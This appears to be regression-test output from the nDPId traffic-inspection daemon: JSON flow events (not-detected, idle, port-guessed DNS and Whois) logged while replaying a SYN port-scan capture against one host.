+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00746{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 